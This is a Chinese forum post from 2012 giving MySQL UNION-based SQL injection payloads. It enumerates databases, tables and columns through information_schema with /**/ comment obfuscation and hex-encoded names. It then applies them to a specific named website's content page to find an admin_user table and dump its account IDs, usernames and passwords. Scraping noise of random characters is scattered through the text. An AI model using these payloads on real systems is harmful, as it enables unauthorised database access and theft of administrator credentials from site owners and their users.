查库. e+ m3 V4 x. U) F
7 C: b1 Q% c) Y" T% ?" k
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/** g9 @7 I5 c9 S _
) B1 J* X" P, ^2 {% M查表
3 k( K- U1 R5 s# J: d
6 _# s: G( h* @0 |id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
& p# z& I9 t2 T% C6 ]: \% K; G( y. e7 m- S6 u2 m" ~* I: a; L8 {; C
查段
7 [4 o. }9 l/ {- _% z$ ]: `
4 e. ~8 U( X6 a- d2 Tid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
' R: s4 X( g" o L+ Q7 P/ B, u! f
" U1 L i5 ]8 v( Amysql5高级注入方法暴表! j8 h/ @3 r. y. U9 C
1 w" O2 d! ?. Y5 m+ O* H
例子如下:
2 f6 H- k0 @, R9 w8 H" c0 I; q1 o. j! o `% X6 `8 J7 S9 r
1.爆表0 U# f: m* R. ]" l: A
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)/ T+ ?) t8 \+ ?
这样爆到第4个时出现了admin_user表。) u: `6 C3 S6 j9 W( f, l, {) y% d
8 n* O' H7 D% z( W( l' J k, Q" Y/ X2.暴字段# Z* v8 B" Y5 G0 a5 M
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
/ ]6 y! X6 j% f( M. ~* |: F
' Y2 M* i4 q5 P$ P5 h( {- i4 v" p! G4 j3 z' D! \6 }+ q3 H% k
3.爆密码! i) e' ~/ C1 `! S3 Z0 `7 j1 C
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* , M, {- e4 T8 u" F( O
3 S4 F) D, ~# c9 t* @2 i
3 f; I& Y' I0 l |
发表于 2012-9-13 16:29:37
收藏
分享
支持
反对